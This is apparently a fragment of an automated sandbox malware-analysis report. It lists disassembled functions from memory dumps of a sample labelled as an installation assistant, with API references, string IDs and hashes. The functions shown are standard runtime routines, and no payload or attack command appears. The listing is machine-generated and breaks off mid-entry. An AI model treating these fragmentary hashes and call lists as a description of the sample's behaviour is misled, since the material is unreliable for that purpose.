                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                        • API String ID: 3519838083-609671
                                        • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction ID: 7865b96e59aa96583483558e8f843adaac20d1103eda7a5f271e5c98267cca84
                                        • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction Fuzzy Hash: 45D10639A04209DFCF11CFB4D990BEEB7B5FF15309F244059E455A3A50DB78AA89CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$H_prolog
                                        • String ID: >WJ$x$x
                                        • API String ID: 2300968129-3162267903
                                        • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction ID: e33a0365a2df44057f2b78608595da2dc0114758c1d5eba51e75b198ba34a44f
                                        • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction Fuzzy Hash: A2127A7190421DEFDF10DFA4C880AEDBBB5FF18318F208569E915ABA50DB3A9A45CF50
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 6C0C9B07
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0C9B0F
                                        • _ValidateLocalCookies.LIBCMT ref: 6C0C9B98
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0C9BC3
                                        • _ValidateLocalCookies.LIBCMT ref: 6C0C9C18
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                        • Instruction ID: 248b647b548985cc82dbf524d41ab9795b036e2e42ce8fb00be39b9ab36ca4e7
                                        • Opcode Fuzzy Hash: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                        • Instruction Fuzzy Hash: 0A418E34B10219ABCF00DF68C884BDEBBF5AF4521CF158155E8159BB51DB36AA05CF92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 0-537541572
                                        • Opcode ID: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                        • Instruction ID: f21468d2327a1c8a36667c154faf9d3c29340ae8e33a855014bdc6422798d3b2
                                        • Opcode Fuzzy Hash: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                        • Instruction Fuzzy Hash: 8221C632A56B31BBDB114B69CC40B0A36E89F07768F170A50EC25E7A80DB30FD0085E2
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                        • __fassign.LIBCMT ref: 6C0DC0D8
                                        • __fassign.LIBCMT ref: 6C0DC0F5
                                        • WriteFile.KERNEL32(?,6C0E5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC13D
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C0DC17D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC229
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                        • String ID:
                                        • API String ID: 4031098158-0
                                        • Opcode ID: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                        • Instruction ID: c6a783d8a3aa24b557a54ea31d28ae4ce6ea9288a7d22d1f334704c3e870e5b0
                                        • Opcode Fuzzy Hash: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                        • Instruction Fuzzy Hash: F4D19B75E012989FCF11CFE8C880AEDBBF5BF49314F25415AE856AB241D631AA46CF50
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                        • __Getctype.LIBCPMT ref: 6BF93084
                                        • std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                        • String ID:
                                        • API String ID: 1102183713-0
                                        • Opcode ID: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                        • Instruction ID: e9dd71bfa0bf4bc6e2a47e18f1249ae8981637b791f996d232dc01af1ec136ac
                                        • Opcode Fuzzy Hash: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                        • Instruction Fuzzy Hash: 90418DB2E042548FEB14DF98D854BAEBBF0FF44714F004159D829AB760D739AA04CF91
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$__aullrem
                                        • String ID:
                                        • API String ID: 2022606265-0
                                        • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction ID: 46df268e7501fd47bc41ac3def7f9f26c10e0fb9678d60b13b5ed515b16c951c
                                        • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction Fuzzy Hash: AA219E70A01219BBDF208E948C80EDF7E69FF467A8F248626B52461694DA71CD60CAE5
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C10A6F1
                                          • Part of subcall function 6C119173: __EH_prolog.LIBCMT ref: 6C119178
                                        • __EH_prolog.LIBCMT ref: 6C10A8F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: IJ$WIJ$J
                                        • API String ID: 3519838083-740443243
                                        • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction ID: 3d75961bfbc3dadb5d5bb7696bd7823ca9d2605f34140845fe26f0392871312f
                                        • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                        • Instruction Fuzzy Hash: F071AE30A04255DFDB04CF68C484BDDB7F0BF14308F1080AAD8656BB91CB75BA4ACB90
                                        APIs
                                        • _free.LIBCMT ref: 6C0E5ADD
                                        • _free.LIBCMT ref: 6C0E5B06
                                        • SetEndOfFile.KERNEL32(00000000,6C0E46EC,00000000,6C0DB0D0,?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000), ref: 6C0E5B38
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0E5B54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFileLast
                                        • String ID: 8Q
                                        • API String ID: 1547350101-4022487301
                                        • Opcode ID: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                        • Instruction ID: f9b46d84d014247ce8a0782a893b4207617b708860e57c09b5155c60f4872154
                                        • Opcode Fuzzy Hash: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                        • Instruction Fuzzy Hash: DB41CB3A640615AFDB019BB8CC81BCE37F5EF4D328F290951E424D7B90EB34E4458B61
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C11E41D
                                          • Part of subcall function 6C11EE40: __EH_prolog.LIBCMT ref: 6C11EE45
                                          • Part of subcall function 6C11E8EB: __EH_prolog.LIBCMT ref: 6C11E8F0
                                          • Part of subcall function 6C11E593: __EH_prolog.LIBCMT ref: 6C11E598
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: &qB$0aJ$A0$XqB
                                        • API String ID: 3519838083-1326096578
                                        • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction ID: 75037fd76694717641aeb8acc3d10ed11bbb21d6ba83c55f7acdb7e8ee61ca51
                                        • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                        • Instruction Fuzzy Hash: 3C21BB71D05258EACB04CBE4D984AECBBF4AF15318F20406AE82263B81DB781F4CCB60
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF13F
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0CF152
                                        • FreeLibrary.KERNEL32(00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF175
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                        • Instruction ID: 4db272fd0deddf028ff289affeeb73d8fa6864d18cb08b5b1976edd9c1d8df20
                                        • Opcode Fuzzy Hash: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                        • Instruction Fuzzy Hash: 6AF08C31601119FBDF02AB90DD19B9E7EF8EB0575AF211060FC15E2490CF708B40DA92
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0C732E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                          • Part of subcall function 6C0C7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0C7248
                                        • std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                        • _Yarn.LIBCPMT ref: 6C0C736A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                        • String ID:
                                        • API String ID: 1088826258-0
                                        • Opcode ID: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                        • Instruction ID: 45c59611db76ce213487bceedcd7eafaa054b97e7172e08b056eb38fe8350744
                                        • Opcode Fuzzy Hash: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                        • Instruction Fuzzy Hash: A701DFB57042149BCB06DF24C840BBC7BF1FF86254B15000AE81197780CF38AA56DBC6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $!$@
                                        • API String ID: 3519838083-2517134481
                                        • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction ID: 7f229535afa36cce14165ec9a3732901ce70c797baf8a42c3c4a534014c53327
                                        • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction Fuzzy Hash: 38125B74E06249DFCB04CFA4C590ADDBBB1BF09348F14C46AE845ABB51DB31E995CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog__aulldiv
                                        • String ID: $SJ
                                        • API String ID: 4125985754-3948962906
                                        • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction ID: 3640b816a64c778e459e0b17da178cc570629f12d8b194fb49ce1b374bca28a1
                                        • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction Fuzzy Hash: 92B15BB1E05209DFCB14CF99C884AAEBBB1FF59314B20853EE515A7B50D738AA45CF90
                                        APIs
                                          • Part of subcall function 6C0C7327: __EH_prolog3.LIBCMT ref: 6C0C732E
                                          • Part of subcall function 6C0C7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                          • Part of subcall function 6C0C7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                          • Part of subcall function 6C0C7327: _Yarn.LIBCPMT ref: 6C0C736A
                                          • Part of subcall function 6C0C7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                          • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                          • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                          • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                          • Part of subcall function 6BF92F60: __Getctype.LIBCPMT ref: 6BF93084
                                          • Part of subcall function 6BF92F60: std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                          • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                        • std::ios_base::_Addstd.LIBCPMT ref: 6BF9211B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 3332196525-1866435925
                                        • Opcode ID: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                        • Instruction ID: 86c2c66132a7525e9e06a299cd669b429aeca26d874329f1f5f3fbba819935b6
                                        • Opcode Fuzzy Hash: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                        • Instruction Fuzzy Hash: E54191B1A003099FEB00DF64D8457AEBBB1BF48314F108268E9159B391D776A985CF91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C124ECC
                                          • Part of subcall function 6C10F58A: __EH_prolog.LIBCMT ref: 6C10F58F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: :hJ$dJ$xJ
                                        • API String ID: 3519838083-2437443688
                                        • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction ID: 31d45960e8cc0bc9f8d5c9074e0e702c3de33e26657c986efcf2c70583619d77
                                        • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction Fuzzy Hash: 6521D8B0901B40CFC760CF6AC14428ABBF4BF2A708B10C95EC4AA97B11D7B8B649CF55
                                        APIs
                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C0DB0D0,6BF91DEA,00008000,6C0DB0D0,?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA), ref: 6C0DADC9
                                        • GetLastError.KERNEL32(?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA,?,6C0E469E,6C0DB0D0,000000FF,000000FF,00000002,00008000,6C0DB0D0), ref: 6C0DADD3
                                        • __dosmaperr.LIBCMT ref: 6C0DADDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 2336955059-4022487301
                                        • Opcode ID: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                        • Instruction ID: 9839841b224ce3d1d044373a70d650bbf980cc1c1144397b44380d4486d556d0
                                        • Opcode Fuzzy Hash: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                        • Instruction Fuzzy Hash: 90018D337146157FCF058FA9DC05A9E3BB9DB853257360205F812D7680EA71F9418BA1
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D49B7
                                        • _free.LIBCMT ref: 6C0D4A14
                                        • _free.LIBCMT ref: 6C0D4A4A
                                        • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D4A55
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
